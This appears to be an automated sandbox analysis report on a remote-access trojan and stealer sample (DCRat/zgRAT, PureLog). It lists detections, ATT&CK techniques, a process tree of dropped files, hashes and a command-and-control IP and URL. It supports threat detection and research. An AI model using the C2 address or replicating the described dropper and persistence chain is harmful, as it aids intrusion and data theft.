                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: winIntorefruntimebroker.exe PID: 7460, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7652, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7952, type: MEMORYSTR
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts2
                                    Command and Scripting Interpreter
                                    11
                                    Scripting
                                    11
                                    Process Injection
                                    23
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services11
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    1
                                    Disable or Modify Tools
                                    LSASS Memory121
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable Media2
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager1
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared Drive2
                                    Non-Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                    Process Injection
                                    NTDS41
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput Capture12
                                    Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets1
                                    Remote System Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                                    Obfuscated Files or Information
                                    Cached Domain Credentials1
                                    System Network Configuration Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                                    Software Packing
                                    DCSync3
                                    File and Directory Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc Filesystem36
                                    System Information Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1583844, Sample: 7vP2IvNXqx.exe, Startdate: 03/01/2025, Architecture: WINDOWS, Score: 100
Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 12 other signatures

• 7vP2IvNXqx.exe (started)
    dropped: C:\Users\user\...\winIntorefruntimebroker.exe, PE32
    dropped: AM6p4h9HDRVrPwzz61...dr9KsZj3Jw8eGFm.vbe, data
  • wscript.exe (started)
      signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    • cmd.exe (started)
      • winIntorefruntimebroker.exe (started)
          dropped: C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32
          dropped: C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32
          dropped: C:\...\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PE32
          dropped: 3 other malicious files
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        • cmd.exe (started)
            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
          • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (started)
              network: 206.188.197.24, 49730, 49737, 49738 DEFENSE-NETUS United States
              dropped: C:\Users\user\AppData\...CvQfnJznV.bat, DOS
            • cmd.exe (started)
                signature: Uses ping.exe to sleep
              • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (started)
                  dropped: C:\Users\user\AppData\...\ddp3dI2Wa5.bat, DOS
                • cmd.exe (started)
                  • conhost.exe (started)
              • conhost.exe (started)
              • chcp.com (started)
              • PING.EXE (started)
          • w32tm.exe (started)
          • conhost.exe (started)
          • chcp.com (started)
      • conhost.exe (started)

Source | Detection | Scanner | Label
7vP2IvNXqx.exe | 66% | ReversingLabs | Win32.Trojan.Uztuby
7vP2IvNXqx.exe | 100% | Avira | VBS/Runner.VPG
7vP2IvNXqx.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
http://206.188.197.24 | 0% | Avira URL Cloud | safe
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php | 0% | Avira URL Cloud | safe
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti | 0% | Avira URL Cloud | safe
                                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://206.188.197.24 | fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | winIntorefruntimebroker.exe, 00000004.00000002.1691880334.0000000004042000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1943857058.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2009516742.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2076714879.0000000003527000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2189053603.0000000002B07000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002A.00000002.2256531415.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2323301689.0000000003047000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000034.00000002.2398807825.0000000003017000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2466038255.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti | fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000003F.00000002.2531748971.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
206.188.197.24 | unknown | United States | 55002 | DEFENSE-NETUS | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1583844
                                      Start date and time:2025-01-03 18:31:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 56s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:71
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:7vP2IvNXqx.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:1a3a764c4b4974435dba8926e7137766.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@114/50@0/1
                                      EGA Information:
                                      • Successful, ratio: 61.5%
                                      HCA Information:
                                      • Successful, ratio: 68%
                                      • Number of executed functions: 427
                                      • Number of non-executed functions: 115
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.44
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 2284 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 3384 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 7056 because it is empty
                                      • Execution Graph export aborted for target fXvSafnhbinoSxnWSYFNsCJETLnb.exe, PID 7652 because it is empty
                                      • Execution Graph export aborted for target winIntorefruntimebroker.exe, PID 7460 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: 7vP2IvNXqx.exe
Time | Type | Description
12:32:16 | API Interceptor | 10x Sleep call for process: fXvSafnhbinoSxnWSYFNsCJETLnb.exe modified
                                      No context
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DEFENSE-NETUS | DEMONS.spc.elf | malicious | Unknown | 107.162.185.251
 | arm5.nn.elf | malicious | Mirai, Okiru | 170.158.166.84
 | 676556be12ac3.vbs | malicious | Mint Stealer | 206.188.197.242
 | PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta | malicious | Mint Stealer | 206.188.197.242
 | x86.elf | malicious | Mirai, Moobot | 107.162.185.253
 | home.mips.elf | malicious | Gafgyt, Mirai | 170.158.122.12
 | bpaymentcopy.exe | malicious | HawkEye, MailPassView, PredatorPainRAT | 207.204.50.48
 | phish_alert_iocp_v1.4.48 (80).eml | malicious | InvoiceScam | 107.162.175.186
 | 2stage.ps1 | malicious | Unknown | 206.188.196.37
 | 2stage.ps1 | malicious | Unknown | 206.188.196.37
                                      No context
                                      No context
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (679), with no line terminators
                                      Category:dropped
                                      Size (bytes):679
                                      Entropy (8bit):5.887376162593401
                                      Encrypted:false
                                      SSDEEP:12:b9Kr+9I/6AgvbS/LdWTpBEjcjskRL5iIs1kddAuw:b9KS9IyAgzS/peYcjRPiIs1kdd2
                                      MD5:DC5ED8C25462908FC261542380B69B55
                                      SHA1:D815F06648AD78103C68063552700F7D19C1C006
                                      SHA-256:D5DA9B967486D018E774F0B44A3BE944D23B1081F274D9E2F6BA5F60FC657663
                                      SHA-512:74D529CB2A78691685981D68A618477EAFDDF865FAA8CBAE282EA3D941ECDC37B22E408F500A97C4D8DEE2DF63DBD0CE7F189074A22C0EDED3C5C29A8731E2FB
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (842), with no line terminators
                                      Category:dropped
                                      Size (bytes):842
                                      Entropy (8bit):5.887391669123621
                                      Encrypted:false
                                      SSDEEP:24:f/bf9JKPAJeJ5Z+XxZHZ7k3UzBysvwFmXPl:fzf9JKPUeJ5ZkZoEzBy+EmXt
                                      MD5:2B807045E47A02E2C37F798771C12135
                                      SHA1:D579B959F95D78D4B7474354C1D2F33A4AB643E7
                                      SHA-256:3D48C10B1A77C7A866036B817615022F121CCC16C3F3540D26A78C8135D46E78
                                      SHA-512:B8B9104091967F4940DB77626029395545530BCF191555F213B43AC6C7EAF79165379D76E303953BAF63CE338CFC9C897BBA16E6B4F700F3D27890294057A462
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with very long lines (756), with no line terminators
                                      Category:dropped
                                      Size (bytes):756
                                      Entropy (8bit):5.885130050984507
                                      Encrypted:false
                                      SSDEEP:12:kmvmqDDsn7FzZexsQnihK5kL5EnJPZ3XSFroyaVXExnJPMbrxkKTUXZth5Z33f5K:kmvhWzKVnVPZioLtEjueKTUXTRHf5k+I
                                      MD5:0035C9C6BAB62443753FE55A0CCFBE14
                                      SHA1:B9756A4D04AB17FE993584AA0A1E2481E985E91D
                                      SHA-256:CEACFFD477BFEC8F788B2B3F0D927AEA3DC214D92C81BCE3A52292073F093605
                                      SHA-512:EFD4B0ACEC037FAE12160C8C885B27C66E12BD44540C96F5BD5A5351C70CE68FCB9FE80180798B0A8EB66CD3D3F4CBCCB83AC441AEA2A6A48F02982BB7C0DB94
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1523
                                      Entropy (8bit):5.373534083924954
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
                                      MD5:5E675003E8A6113031BC81EC692CFE0A
                                      SHA1:53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
                                      SHA-256:5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
                                      SHA-512:4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1089
                                      Entropy (8bit):5.357509376572314
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4x
                                      MD5:84D615B35EDCC29D404E189F0403DF92
                                      SHA1:9FA889FD1624FD4D42C8A1E53A6C878D563B2B05
                                      SHA-256:ED840908AC2487C0156C61BBFCF4332B1824C033F03400FE906BBB44482205F5
